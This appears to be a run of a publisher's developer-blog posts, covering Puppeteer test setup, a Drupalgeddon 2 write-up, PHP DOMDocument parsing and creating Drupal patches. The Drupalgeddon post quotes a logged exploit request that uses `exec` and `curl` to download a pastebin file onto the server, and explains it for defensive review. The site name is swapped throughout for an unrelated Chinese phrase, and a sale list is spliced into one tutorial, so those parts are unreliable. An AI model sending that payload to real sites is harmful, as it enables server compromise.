In a previous post on the 国产吃瓜黑料 Developer Blog, we talked about our development workflow and how it includes a testing process. Over the past couple of months, we've been experimenting with making our testing process more efficient and helpful for our developers. In our research, we came across a tool from Google called Puppeteer, “a high level API to control Chrome or Chromium over the DevTools Protocol.” In more basic terms, Puppeteer allows you to do anything you would do manually in Chrome but through code. Need a screenshot? Want to test form inputs? Need to test your web speed? Puppeteer can do all that and more.
Our tests used to be built using a tool called CasperJS that ran on top of a headless browser. Our experience with Casper has unfortunately been troublesome, with tests failing for no apparent reason and inconsistencies across runs. Our tests were becoming so finicky that we started commenting out tests that we knew were succeeding in the browser but failed for Casper. We still needed our builds, but Casper was no longer a reliable source of information about passing and failing tests. This was obviously a bad sign and bad practice, and it would lead to trouble down the line.
After experimenting and researching Puppeteer, we arrived at two questions:
Should we change our tests from Casper to Puppeteer?
Would Puppeteer be better and thus worth the switch?
As a team we decided it would at least be worth implementing one of our tests in Puppeteer and viewing the results.
For our test, we decided that Puppeteer would be the headless browser instance and that Mocha and Chai would help us with assertions. Mocha and Chai are JavaScript libraries that run tests and determine whether an assertion passes or not. For example, we assert that the homepage has the title “国产吃瓜黑料” on it. Mocha runs the test, and Chai checks the result against the expectation and returns true or false. Each test instantiates a headless Chrome instance using Puppeteer and uses Mocha and Chai to run the assertions.
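In code, that flow looks roughly like this (a simplified sketch of the pattern – the full setup is walked through in Part 2):
const puppeteer = require('puppeteer');
const { expect } = require('chai');

describe('Homepage Test', function () {
  let browser;
  let page;

  before(async () => {
    // Launch a headless Chrome instance and open the homepage.
    browser = await puppeteer.launch({ headless: true });
    page = await browser.newPage();
    await page.goto('https://www.outsideonline.com');
  });

  after(async () => {
    await browser.close();
  });

  it('should have the title', async () => {
    // Chai compares the actual title against the expectation.
    expect(await page.title()).to.eql('国产吃瓜黑料 Online');
  });
});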
Getting started with Puppeteer, Mocha, and Chai proved to be extremely straightforward. We were able to convert a previously failing Casper test to a working Puppeteer test within a few hours. After we got one test suite running, we worked on converting all of our tests to Puppeteer and removing Casper from our process. In this shift, we were able to provide developers with more tools to help debug failing tests. Puppeteer has the option to run Chrome in a non-headless state, so a browser window opens up with the test parameters and allows a developer to interact with the test. We were also able to implement a screenshot workflow that captures the webpage for any failing test. Both of these options are simple parameters passed to the testing script. Our experience so far has been a success, and we look forward to diving deeper into Puppeteer.
Be sure to check out Part 2 to learn how we implemented Puppeteer, Mocha, and Chai to create our new test suite.
The post Testing with Puppeteer – Part 1 appeared first on 国产吃瓜黑料 Online.
In our last post about implementing tests with Puppeteer, we did a high-level overview of some of the decisions we made to switch from Casper to Puppeteer. In this post, we are going to go over the code that makes our tests work.
At the end of this tutorial, we will have a fully working test that implements Puppeteer, Mocha, and Chai for 国产吃瓜黑料 Online.
Let's first start by creating a new folder in the directory of your choosing.
Inside this folder, run npm init – feel free to name it however you like and fill in any values you prefer; there is nothing special in this step.
Next, we need to install 4 modules. Two of them are devDependencies and two are regular dependencies:
npm install --save lodash puppeteer
npm install --save-dev mocha chai
I did not mention lodash in the previous post, but it is a utility library that we will use minimally.
After installation completes, create an empty bootstrap.js file in the base directory to bootstrap our tests.
Lastly for initialization, we need to modify package.json to run mocha correctly:
...
"scripts": {
"test": "mocha bootstrap.js";
}
...
In your terminal, if you run npm test you should get an output saying 0 passing. This is exactly what we want – it signals everything is correctly installed and mocha is running.
The next thing we need to do is bootstrap all of our tests with puppeteer.
Head back to your text editor and open up the bootstrap.js file.
We now need to import the libraries we installed:
const puppeteer = require('puppeteer');
const { expect } = require('chai');
const _ = require('lodash');
One of the benefits of using mocha is that we can define before and after functions that will run before our test suite and then after. This is ideal for setup and cleanup around our tests.
We are going to create a before function to set up puppeteer:
before (async function () {
global.expect = expect;
global.browser = await puppeteer.launch({headless: true});
});
The before function does 2 things – it sets up expect as a global variable to use in all of our tests, and it creates a puppeteer browser instance that we can reuse. We do this so we are not creating a new browser for each test, just using a single one.
Inside of launch() for puppeteer we are passing in the option headless: true. This flag determines how Chrome will launch – with a visible browser window or not. For now, we are setting it to be headless, but if you wanted to see an actual Chrome browser open up and run, you would set it to false.
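For example, while debugging locally you might launch it like this (a hypothetical tweak – slowMo is an optional Puppeteer launch setting that slows each operation down so you can watch it):
// Open a visible browser window and slow each action down by 250ms.
global.browser = await puppeteer.launch({ headless: false, slowMo: 250 });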
Now for our after function, we are just going to do a little cleanup:
after (function () {
browser.close();
});
All that is doing is closing down the puppeteer browser instance we created.
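Putting those pieces together, bootstrap.js at this point looks roughly like this (assembled from the snippets above):
const puppeteer = require('puppeteer');
const { expect } = require('chai');
const _ = require('lodash');

before(async function () {
  // Expose expect globally and launch one shared browser for all tests.
  global.expect = expect;
  global.browser = await puppeteer.launch({ headless: true });
});

after(function () {
  // Shut down the shared browser once the suite finishes.
  browser.close();
});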
With all the setup work now complete, we can create our first test! For this test, we are going to keep it really simple and make sure that 国产吃瓜黑料's homepage has the correct title.
Before we get started, check out the documentation for some examples of how to write tests.
Next, go ahead and create a directory within your project called test.
Inside the test directory, create a new file called homepage.spec.js – this will be the file where we write our homepage tests.
To start our test inside homepage.spec.js, we have to describe it:
describe('Homepage Test', function() {
});
In the previous section we set up the base bootstrap for all tests. Now, we need to set up a before function that handles what should happen before the tests are run. In this scenario it needs to:
Open a new tab
Go to a specific URL
Within the describe function, let's create the before initialization:
before (async () => {
page = await browser.newPage();
await page.goto('https://www.outsideonline.com', { waitUntil: 'networkidle2' });
});
With the before successfully created, we can now write our test right below the before function!
it("should have the title", async () => {
expect(await page.title()).to.eql("国产吃瓜黑料 Online")
});
The above test should read almost like a sentence – we “expect” the page title to equal 国产吃瓜黑料 Online. Pretty simple, right?
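For reference, homepage.spec.js assembled from the snippets above looks roughly like this (as in the snippets, page is used as an implicit global, and the homepage URL is the production one referenced later in this series):
describe('Homepage Test', function () {
  before(async () => {
    // Open a new tab in the shared browser and load the homepage.
    page = await browser.newPage();
    await page.goto('https://www.outsideonline.com', { waitUntil: 'networkidle2' });
  });

  it('should have the title', async () => {
    expect(await page.title()).to.eql('国产吃瓜黑料 Online');
  });
});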
With our test complete, we just need to do one more thing – update our package.json script.
...
"scripts": {
"test": "mocha bootstrap.js --recursive test/ --timeout 30000"
}
...
We added two more parameters to the test script:
The --recursive test/ parameter tells mocha to look into the test/ folder and recursively run all tests that it finds. For us it is only 1, but you can imagine a folder full of subfolders and subtests that all need to be run.
The --timeout 30000 sets the mocha timeout to 30 seconds instead of 2000ms. This is important because it takes some time for puppeteer to launch and, without the longer timeout, the tests would fail before the browser even starts!
With that now complete, we can run our tests with a simple npm test.
We should now see that the test has run correctly and the 国产吃瓜黑料 homepage has the title “国产吃瓜黑料 Online”.
If you want to double check to make sure it is working, go back to homepage.spec.js and change the title to expect something else like “Welcome to 国产吃瓜黑料!”:
it("should have the title", async () => {
expect(await page.title()).to.eql("Welcome to 国产吃瓜黑料")
});
If we do that and rerun the tests, we should see that it has failed. Congratulations, you are up and running!
If you've run into any errors or problems, visit the gist to compare your code. Be sure to check out Part 3 of this series to learn how to pass custom parameters to your tests and generate screenshots for failing tests!
The post Creating Tests with Puppeteer: Part 2 appeared first on 国产吃瓜黑料 Online.
In our previous two posts, we talked about why we switched to Puppeteer and how to get started running tests. Today, we are going to work on customizing tests by passing in custom parameters.
We need to be able to pass in custom parameters for debugging and local testing. Our tests currently run through Travis CI, but if a developer needs to run the tests locally, the options are not exactly the same.
The URL for the test will be different
The developer usually needs to debug the tests to determine why they failed
We implemented three custom parameters to help with this problem:
Ability to pass in a custom URL
Ability to run Chrome in a non-headless state
Ability to have screenshots taken of failing tests
We are going to go through all of these custom parameters and learn how to implement them.
At 国产吃瓜黑料, we run our tests on a development Tugboat environment and on our local machines. The two base URLs for these environments differ, but the paths to specific pages do not. For example, our local machines point to http://outside.test while our Tugboat environments are unique for each build.
We are going to pass a parameter that looks like this: --url={URL}. For our local site, the full command ends up being npm test -- --url=http://outside.test.
Let's get started in setting this up.
We need to set up a variable containing the base URL that will be accessible across all files. In bootstrap.js, inside the before function, we are going to name the variable baseURL:
before (async function () {
...
global.baseURL = '';
...
});
Now we need to access the arguments that are passed in from the command line. In JavaScript, these arguments are stored in process.argv. If we console.log them real quick, we can see everything we have access to:
global.baseURL = '';
console.log(process.argv);
Head back to your terminal and run npm test -- --url=www.outsideonline.com. You should see an array of values printed:
[ '/usr/local/Cellar/node/10.5.0_1/bin/node',
'bootstrap.js',
'--recursive',
'test/',
'--timeout',
'30000',
'--url=www.outsideonline.com' ]
From the above array, we can see that our custom parameter is the last element. But don't let that fool you! We cannot guarantee that the URL will be the last parameter in this array (remember, we have 2 more custom parameters to create). So we need a way to loop through this list and retrieve the URL:
Inside before in bootstrap.js we are going to loop through all the parameters and find the one we need by the url key:
for (var i = 0; i < process.argv.length; i++) {
var arg = process.argv[i];
if (arg.includes('--url')) {
// This is the url argument
}
}
In the above loop, we set arg to be the current iteration value and then check if that string includes url in it. Simple enough, right?
Now we need to set the global.baseURL to be the url passed in through the npm test command. However, we need to note that the url argument right now is the whole string --url=www.outsideonline.com. Thus, we need to modify our code to retrieve only www.outsideonline.com. To retrieve only the url, we are going to split the string at the equal sign using the JavaScript function split. split works by creating an array of the values before and after the defined string to split at. In our case, splitting --url=www.outsideonline.com with arg.split("=") will return ['--url', 'www.outsideonline.com']. We can then grab the URL from index 1 of the split array.
if (arg.includes('url')) {
// This is the url argument
global.baseURL = arg.split("=")[1];
}
Now that we have our URL, we need to update our tests to use it.
Open up homepage.spec.js and we are going to edit the before function in here:
before (async () => {
page = await browser.newPage();
await page.goto(baseURL + '/', { waitUntil: 'networkidle2' });
});
We are also going to keep our test from the previous post on Puppeteer:
it("should have the title", async () => {
expect(await page.title()).to.eql("国产吃瓜黑料 Online")
});
Now, if you run the tests with the url added, it should work as it previously did: npm test -- --url=www.outsideonline.com
Let's create another test to show the value of passing the url through a custom parameter. Inside the test folder, create a file called contact.spec.js. We are going to test the "Contact Us" page found here: /contact-us
In this test, we are going to make sure the page has the title "Contact Us" using a very similar method:
describe('Contact Page Test', function() {
before (async () => {
page = await browser.newPage();
await page.goto(baseURL + '/contact-us', { waitUntil: 'networkidle2' });
});
it("should have the title", async () => {
expect(await page.title()).to.eql("Contact Us | 国产吃瓜黑料 Online")
});
});
As you can see above, using the baseURL, it is very easy to change the page you want to test based on the path. If for some reason we needed to test in our local environment, we would only have to change the --url parameter to the correct base URL!
Having the ability to visually see the Chrome browser instance that tests are running in helps developers quickly debug any problems. Luckily for us, this is an easy flag we just need to switch between true and false.
The parameter we are going to pass in is --head to indicate that we want to see the browser (instead of passing in --headless, which should be the default).
Our npm test script will now look something like this:
npm test -- --url=www.outsideonline.com --head
Inside of before in bootstrap.js, we need to update the for loop we created before to also check for the head parameter:
global.headlessMode = true;
for (var i = 0; i < process.argv.length; i++) {
var arg = process.argv[i];
if (arg.includes('url')) {
// This is the url argument
global.baseURL = arg.split("=")[1];
}
if (arg.includes("--head")) {
global.headlessMode = false;
// Turn off headless mode.
}
}
In this instance, we only need to check if the parameter exists to switch a flag! We are using the variable headlessMode to determine what gets passed into the puppeteer launch command:
global.browser = await puppeteer.launch({headless: global.headlessMode});
Lastly, if we are debugging the browser, we probably do not want the browser to close after the tests are finished – we want to see what it looks like. So inside the after function in bootstrap.js we just need to create a simple if statement:
if (global.headlessMode) {
browser.close();
}
And that's it! Go ahead and run npm test -- --url=www.outsideonline.com --head and you should see the tests in a browser!
Our last custom parameter is to help us view screenshots of failing tests. Screenshots can be an important part of the workflow to help quickly debug errors or capture the state of a test. This is going to look very similar to the head parameter – we are going to pass a --screenshot parameter.
Let's again update before in bootstrap.js to take in this new parameter:
if (arg.includes("screenshot")) {
// Set to debug mode.
global.screenshot = true;
}
Next up, we are going to implement another mocha function - afterEach. afterEach runs after each test, and inside the function we can access specific parameters about the test. Mainly, we are going to check and see if a test failed or passed. If it failed, we then know we need a screenshot. The afterEach function can go in bootstrap.js because all tests we create will be using this:
afterEach (function() {
if (global.screenshot && this.currentTest.state === 'failed') {
global.testFailed = true;
}
});
After a test has failed, we now have a global testFailed flag to trigger a screenshot in that specific test. Note – bootstrap.js does not have all the information for a test, just the base. We need to let the individual test files know if we need a screenshot of a failed test so we get a picture of the right page.
Head back to homepage.spec.js and we are going to implement an after function.
after (async () => {
if (global.testFailed) {
await page.screenshot({
path: "homepage_failed.png",
fullPage: true
});
global.testFailed = false;
await page.close();
process.exit(1);
} else {
await page.close();
}
});
The above function checks if the test has failed based on the testFailed flag. If the test failed, we take a full page screenshot, reset the flag, close the page, and exit the process.
Unfortunately, the above code works best inside each test file, so there will be some code duplication across tests. The path setting makes sure that no screenshot overwrites another test's screenshot, because each test sets the filename to its own name. The screenshot will be saved in the base directory where we run the npm test command from.
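For example, the contact test from earlier would get its own copy of the hook with its own filename (a sketch – contact_failed.png is just an illustrative name):
after (async () => {
  if (global.testFailed) {
    // A per-test filename keeps this screenshot from clobbering the homepage one.
    await page.screenshot({
      path: "contact_failed.png",
      fullPage: true
    });
    global.testFailed = false;
    await page.close();
    process.exit(1);
  } else {
    await page.close();
  }
});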
To test and make sure this works, let's edit homepage.spec.js to expect a different title - like "国产吃瓜黑料 Magazine":
it("should have the title", async () => {
expect(await page.title()).to.eql("国产吃瓜黑料 Magazine")
});
We know this one will fail, so when we run npm test -- --url=https://cdn.outsideonline.com --screenshot we should get a generated screenshot! Look for a file named homepage_failed.png.
Adding custom parameters to your npm script is fairly simple once you get the hang of it. From there, you can easily customize your tests based on these parameters. Even with the custom parameters we have created, there is room for improvement. Stricter checking of the parameters would be a good first step to rule out any unintended use cases (see the sketch below). With the custom url, headless mode, and screenshots, our tests are now easier to manage and debug if something ever fails. Check out the Puppeteer, Mocha, and Chai documentation to learn more!
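As a rough illustration of what that stricter checking might look like (a hypothetical sketch, not code from our test suite), the argument loop in bootstrap.js could validate values and match flags exactly, keeping in mind that mocha's own flags such as --recursive and --timeout also appear in process.argv:
global.baseURL = '';
global.headlessMode = true;
global.screenshot = false;

for (const arg of process.argv) {
  if (arg.startsWith('--url')) {
    const value = arg.split('=')[1];
    if (!value) {
      // Fail fast instead of silently running against an empty base URL.
      throw new Error('--url requires a value, e.g. --url=http://outside.test');
    }
    global.baseURL = value;
  } else if (arg === '--head') {
    global.headlessMode = false;
  } else if (arg === '--screenshot') {
    global.screenshot = true;
  }
}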
The post Customizing Puppeteer Tests: Part 3 appeared first on 国产吃瓜黑料 Online.
This past March and April, the Drupal Security Team announced two highly critical security patches: “Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002” and “Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-004”. First off, before I go any further, if you operate a Drupal site and have not applied these patches already, please patch your site right now. Unfortunately (and not to get too pessimistic), if your site has some traffic and the patch has not been applied, your site is most likely already hacked. If your site was exploited, please act immediately.
If we take a dive into the patch file provided by the Drupal Security Team, we can see two files were edited:
includes/bootstrap.inc
includes/request-sanitizer.inc
In these files, a new line was added to bootstrap.inc which calls a new function within request-sanitizer. Two new functions were added to request-sanitizer:
sanitize
stripDangerousValues
Looking at the flow, the sanitize() function is added to bootstrap.inc to check the parameters being passed through. For those parameters, it will remove “dangerous values”, thus the name. If you check out the code for Drupal 7.x, you can see that the security patch is fairly small. Don't let the amount of code fool you, though – the implications are massive.
For versions 6, 7, and 8 of Drupal, there was a vulnerability with sending data through the Form API – if there exists a property key with a hash sign #, the data associated with it would pass through. Why is this an issue? Well, if you think about how developers use some of the APIs in Drupal, many of them contain # signs. Take one look at the Form API reference, and you can see many, many properties marked with a # – #prefix, #markup, #post_render, #pre_render, #type, etc. This means that a hacker could in theory create a GET or POST request to certain URLs, passing in whatever data they wanted. Scary.
SA-CORE-2018-004 piggybacks on the first security patch but has a slightly different use case. If you look at the security list you will see “20/25 AC:Basic/A:User/CI:All/II:All/E:Exploit/TD:Default.” The “A:User” part means that the issue applies to “user-level access.” What does that mean? It means that there must be some level of permission for the issue to be exploited. While that may be some relief, it is still highly critical. If a hacker successfully exploited the first security issue, then they would easily be able to maneuver past this. Looking at the patch, we can see 4 impacted files:
bootstrap.inc
common.inc
request-sanitizer.inc
file.module
The main takeaway from this patch is the cleanDestination() function added to request-sanitizer.inc (which was added in the first security patch). The purpose of cleanDestination is to “remove the destination if it is dangerous”, per the code comments. This function uses the previously built stripDangerousValues and determines if the destination is “dangerous.” If it is, it will unset the destination from the request and trigger an error: “Potentially unsafe destination removed from query string parameters (GET) because it contained the following keys: @keys.” This adds another layer of security to requests sent to Drupal, alongside stripDangerousValues.
The question you may be asking yourself now is “will this happen to me?” Yes. Yes, it will.
Back in March, I was the one who had the opportunity to apply the fix to Drupal core – a fairly simple process that took all of 5 minutes. So, in thinking about the security patch almost a month later, I decided to do some digging into our logs to see if anyone had actually attempted to use this exploit on our site. I used references from the SANS Internet Storm Center, a site that “gathers millions of intrusion detection log entries every day”, to pinpoint exactly what to look for. In their write-up, hackers can be seen trying to manipulate different API calls with the # sign.
As it so happens, 国产吃瓜黑料 Online was targeted in the past two weeks with this exploit.
134.196.51.197 - - [19/Apr/2018:07:24:26 +0000] "POST /category/indefinitelywild/?q=user/password&name[%23post_render][]=exec&name[%23markup]=curl+-o+misc%2fserver.php+https%3a%2f%2fpastebin.com%2fraw%2fhhWU03ih&name[%23type]=markup HTTP/1.1" 200 10326 "-" "Mozilla/5.0 (Windows NT 5.1; rv:47.0) Gecko/20100101 Firefox/47.0"
Looking at that request from our logs above, it already looks very suspicious. There shouldn't be any POST requests going to a category page, especially not a user POST request. Let's clean it up a little:
POST /category/indefinitelywild/?q=user/password&name[#post_render][]=exec&name[#markup]=curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih&name[#type]=markup
Immediately there are some suspicious aspects to this request. First off, exec is a PHP function used to execute commands. Secondly, the code is sending a curl request to a pastebin URL, which sounds dangerous. Basically, the hacker was trying to execute whatever functionality was in their pastebin. When the post_render function fired, it would call exec on curl+-o+misc/server.php+https://pastebin.com/raw/hhWU03ih, which would download whatever is in the pastebin and run it. Scary scary scary. Note: I went to the pastebin URL; it has since been removed.
For the second security patch, we stayed diligent, patched our site as soon as possible, and thankfully didn't see any problems. Fortunately, we had the resources to do that, because the second security patch had known exploits in the wild within hours of its release.
Exploitations of this issue are most commonly pointed at anything dealing with users. Why? There is one common set of forms that hackers can assume exists on every Drupal site – user login, user registration, user password reset, etc. All Drupal sites have users associated with them; otherwise they would be static websites. Thus, hackers use this common denominator on all sites instead of trying to search page by page to find a form.
Another thing to look for is any passing of exec in a URL – this is a request trying to execute code. Lastly, in these requests, the only possible targets are parameters with the # sign.
If you suspect that your site has been hacked, here are a couple signs and methods that have been shared online:
The most obvious, but still-used, approach is to replace the homepage. Some hackers replace the homepage with a page announcing the hack and a link to their profile asking to be “paid.”
New users added to your site that you don't recognize.
If you have access to the code repository with source control like git, run git status – if you notice new PHP files, changes to JS files, or anything else that you know was not part of your code changes, then hackers most likely were able to access your codebase.
Another sneaky attack is injecting script tags into the body field of Drupal content types. You may think doing a reset of your code base would fix it, but those entities live in the database, so they will be executed until the data is sanitized.
Hackers also inject cryptomining software into a plethora of sites. One would notice this by checking server usage, as there may be a spike. This is often done using a mining script that has been around for a couple of years.
If you have been hacked, those would be the most likely places to start your search. Again, please act immediately – the Drupal Security Team has outlined steps to help you get your site back up and running.
The post Drupalgeddon 2 – What & Why appeared first on 国产吃瓜黑料 Online.
Recently our development team needed to find a way to manipulate the body of an article and return JSON objects of all the body content. This was because of the constraints of the Apple News Publishing Format, which 国产吃瓜黑料 recently joined. We needed to separate almost all HTML elements into their own individual component/object. As you can imagine, trying to write custom code to parse the body would've taken a long time and would've never captured all the permutations. After doing some research, we learned we were able to use PHP's DOMDocument class to manipulate our body HTML content and solve the separation-of-HTML-elements problem.
The DOMDocument is a class built in to PHP that helps developers navigate an HTML document tree and provides methods to help interact with the document. If you ever need to parse HTML content or manipulate HTML content using PHP, DOMDocument can help you quickly and easily access nodes.
At 国产吃瓜黑料, one thing we pride ourselves on is finding and sharing the best gear available. Today, we're going to take a gear article and do a simple count of how many links are inside the body. DOMDocument is fairly easy to set up, and from there, you can manipulate it to your specific scenario.
View the article here: Upgrade Your Gear Closet with These 10 Great Deals
Here is a copy of the HTML content for your own testing purposes
Initialize the DOMDocument()
$dom = new DOMDocument();
Load our HTML into the $dom object.
$dom->loadHTML($body);
1. With our HTML now loaded into the DOMDocument() object, we can use the method getElementsByTagName(), which exists in the DOMDocument class, to get all link elements.
$links = $dom->getElementsByTagName('a');
2. For this specific example, all we need to do is get the number of links. The method getElementsByTagName() returns a DOMNodeList, so we use the length property on the DOMNodeList to get the number of links.
$body = HTML_CODE_HERE;
$dom = new DOMDocument();
$dom->loadHTML($body);
$links = $dom->getElementsByTagName('a');
$num_links = $links->length;
print($num_links); // 21
3. If you take a look at the article and the HTML, you will see that we have 2 types of links. We have regular links within text but we also have links with a class of btn. The btn links have a button style to them.
4. Next, we鈥檙e going to loop through all of the links so we can iterate on each one. Simple enough:
foreach ($links as $link) {
}
5. Each link is a DOMElement, which provides a getAttribute() method we can use to get the class attribute:
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
}
6. Our next step is to check if the class of btn exists on the link.
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
if (strpos('btn', $link_class) !== FALSE) {
$num_btns++;
}
}
7. The above code looks correct, but if you look at the HTML, you'll notice that some links don't contain a class on them. PHP will throw a WARNING because of this. Let's fix that.
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
if (!empty($link_class) && strpos('btn', $link_class) !== FALSE) {
$num_btns++;
}
}
8. The last thing we haven't done is initialize $num_btns:
$num_btns = 0;
foreach ($links as $link) {
$link_class = $link->getAttribute('class');
if (!empty($link_class) && strpos('btn', $link_class) !== FALSE) {
$num_btns++;
}
}
print($num_btns); // 10
9. Great work! As you can see, manipulating HTML can be fairly easy with DOMDocument.
10. DOMDocument can be used for more than document traversal. You can also create new elements and append them to the current HTML.
11. Let's say we want to add a link to the bottom of this page that points to all of our gear articles. We can create a link element using the createElement method!
$gear = $dom->createElement('a', "Check out our Gear Channel");
$gear->setAttribute('href', "/outdoor-gear");
12. After we've created our element, all we need to do now is add it to the $dom. The createElement function creates a new instance of DOMElement, in this case a link, but it will not show up in the document unless it is properly inserted. In that case, we must use the appendChild() function to get it to appear. See the PHP documentation for reference.
$dom->appendChild($gear);
13. Here is the full code for adding a link to our HTML:
$gear = $dom->createElement('a', "Check out our Gear Channel");
$gear->setAttribute('href', '/outdoor-gear');
$dom->appendChild($gear);
print($dom->textContent);
PHP's DOMDocument() class makes it very easy for developers to traverse and manipulate any HTML content. There are many other methods in the class that can prove useful to you: getElementsByTagName, createAttribute, createTextNode, and createCDATASection, just to name a few. No need for any extra libraries or modules – it's all built right in!
To learn more, visit the PHP documentation.
Moosejaw's Almost Everything sale starts Tuesday and goes until April 8. Most products are at least 25 percent off, or you can use the code YAY20 to get 20 percent off a full-price item. Here are a few sale highlights our editors have their eyes on.
Patagonia Women's Nano Puff Hoody ($175; 30 percent off)
Although it packs down to the size of an orange, the Nano Puff has kept our testers warm when temps drop to the 30s. Filled with high-loft synthetic insulation, the ripstop face fabric is treated with DWR to repel water.
Arcteryx Mens Covert Cardigan ($134; 25 percent off)
Perfect for the office or the crag, the merino wool Covert Cardigan is style-oriented but with technical chops. Stash your credit card or chapstick in the zipper arm pocket.
Gregory Men's Baltoro Backpack ($191; 40 percent off)
One of our favorite backpacking packs year in and year out, the 75-liter Baltoro has all the space you need to carry gear for a week in the backcountry. Plus, the removable internal hydration sleeve transforms into a daypack for summit bids.
CamelBak Franconia LR 24 Hydration Pack ($120; 25 percent off)
With plenty of room for extra layers, a first aid kit, and lunch, the Franconia LR 24 also features a lumbar-style hydration reservoir that helps center the weight on the hips and prevents water sloshing.
Hydro Flask 32 Ounce Wide Mouth Bottle ($34; 15 percent off)
Don't settle for warm water or cold coffee – invest in an insulated bottle and never look back. The extra-wide mouth of this bottle allows for easy filling and cleaning.
MSR Hubba Hubba NX 2-Person Tent ($300; 25 percent off)
One of the most iconic tents ever made, the Hubba Hubba was redesigned in 2014. The designers also included color-coded stakeouts for easy setup.
Therm-a-Rest Neoair Dream Sleeping Pad ($152; 44 percent off)
This may just be the ultimate sleeping pad. Its unique design combines an air mattress and a foam topper. It's hands down the most comfortable pad we've ever slept on.
Helinox Chair One Camp Chair ($75; 25 percent off)
Weighing just 1.6 pounds, the Chair One can hold up to 320 pounds. The secret is a pairing of strong but light aluminum poles and tough 600-denier polyester fabric, which creates a package that packs to the size of a Nalgene.
Osprey Women's Ariel AG 65 Backpack ($248; 20 percent off)
Set yourself up for a summer full of adventures with the Ariel AG 65. It features women's-specific touches, like extra-padded S-shaped shoulder straps and a wide hip belt.
Yeti Roadie 20 Cooler ($160; 20 percent off)
Designed for life on the move, the 20-liter Roadie has a sturdy aluminum handle for easy transport. It has room for 16 cans inside, plus ice.
The post HTML Parsing with the DOMDocument appeared first on 国产吃瓜黑料 Online.
This past month at 国产吃瓜黑料, we went through the process of updating all of our environments from PHP 5.6 to PHP 7.1. This process was not an easy one and took some careful testing, inspection, and review to make sure that we didn't miss any code changes between the versions.
Along the way, we encountered an issue with the Bulk Media Upload module, where the summary was not displaying after a successful upload. This issue was actually logged by another user back in September 2016. The reporter graciously provided a solution (an array syntax change), but, in the process, uploaded a diff instead of an actual patch file.
As the newest member of the team, I had actually never created or applied patches to any Drupal project, so the process became a learning experience for me and one that I wanted to share with you.
A patch is a specific file that outlines all the changes made between two sets of files. For example, if I have a file and I make some changes to it, I would create a patch file that showcases the differences that I have implemented, and then I would submit it so other developers can review and/or implement it. This way, when developers are contributing to Drupal core or contributed modules, they can easily submit patches for any fixes without sending over a completely new file.
A patch file looks very similar to what you see when you run git diff on a file. It outlines all the added lines (+) and all the removed lines (-) in that specific file. Patches usually start out as diff files and then move to a patch file. Below is the output of a git diff for a file, where we can see the added (+) and removed (-) lines.
diff --git a/test_module.module b/test_module.module
index 17b9c77..9dc0261 100644
--- a/test_module.module
+++ b/test_module.module
@@ -13,7 +13,8 @@ function test_module_menu() {
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
-    'title' => 'Test Module Settings',
+    'title' => 'Test Module Admin Settings',
+    'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
When creating a patch file, there are two things to note before submitting it:
Make sure you are in the git repository for that one module. If you are creating a patch for a contrib module, download that contrib module from Drupal.org and apply the change there, not in your project-specific repository.
The diff file is not what you upload to Drupal.org; make sure you have a .patch file.
Let's get started! If you would like to follow along, the examples below use a simple module called test_module.
Inside of our test_module, we are going to create a simple patch to change the title of a menu item and add a description. Go ahead and open up test_module.module in your favorite text editor.
Inside of test_module_menu(), update the 'title' to be "Test Module Admin Settings".
Next, add a 'description' to the menu item with the text 'Configure the test module'.
function should look like this:
/**
* Implements hook_menu().
*/
function test_module_menu() {
$items = array();
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
'title' => 'Test Module Admin Settings',
'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
);
return $items;
}
Now that we have successfully updated our module, it is time to create the patch!
Open up the terminal and move into the module folder.
Inside the module folder in your terminal, go ahead and run git diff. You should see something very similar to this:
diff --git a/test_module.module b/test_module.module
index 17b9c77..9dc0261 100644
--- a/test_module.module
+++ b/test_module.module
@@ -13,7 +13,8 @@ function test_module_menu() {
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
-    'title' => 'Test Module Settings',
+    'title' => 'Test Module Admin Settings',
+    'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
With the above output, we can now create a patch by running git diff > test_module_patch.patch.
This will create a file, test_module_patch.patch, that has all of the output of the git diff command in it, but as a patch file!
Success! You've officially created your first patch.
Now we want to test to make sure our patch works correctly. If you run git status from the command line, you should see something similar to this:
On branch master
Changes not staged for commit:
(use "git add ..." to update what will be committed)
(use "git checkout -- ..." to discard changes in working directory)
modified: 听听test_module.module
Untracked files:
(use "git add ..." to include in what will be committed)
test_module_patch.patch
no changes added to commit (use "git add" and/or "git commit -a")
听
To test, we will undo the changes we made to test_module.module, apply the patch, and make sure the patch changes are applied to test_module.module. Run git checkout -- test_module.module. The module file will now be back to the original state before we made the changes. If we view the file test_module.module, you will see that the test_module_menu() function looks like it did originally:
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
'title' => 'Test Module Settings',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
);
Next up, we can run git apply test_module_patch.patch. This will apply the patch to the files specified in the patch. So for us, it will apply the changes we made to test_module.module.
If we open test_module.module again, we can see the patch applied!
// Admin configuration group.
$items['admin/config/services/test_module'] = array(
'title' => 'Test Module Admin Settings',
'description' => 'Configure the test module',
'page callback' => 'drupal_get_form',
'page arguments' => array('test_module_admin_settings_form'),
'access arguments' => array('administer site configuration'),
);听
That is all there is to it! Remember to make sure that you are creating a patch in the module-specific git directory. You do not want any project-specific file paths showing up in the patch file.
If you were contributing to a module on Drupal.org, there are a few other rules:
Make sure there's an issue related to the patch you are creating.
Name your patch file appropriately – test_module_patch is a bad name for contributed modules. The best way to do it is with the issue number and a descriptive title. For example: bulk-media-upload-previous-upload-summary-php-7-2800897-12.patch. Look to follow the naming convention of [project_name]-[short-description]-[issue-number]-[comment-number].patch
Make sure your patch follows all Drupal Coding Standards.
Make sure you follow all rules outlined by the module's coding standards.
Congratulations on making a patch! Now you can contribute back to Drupal and all of the contributed modules.
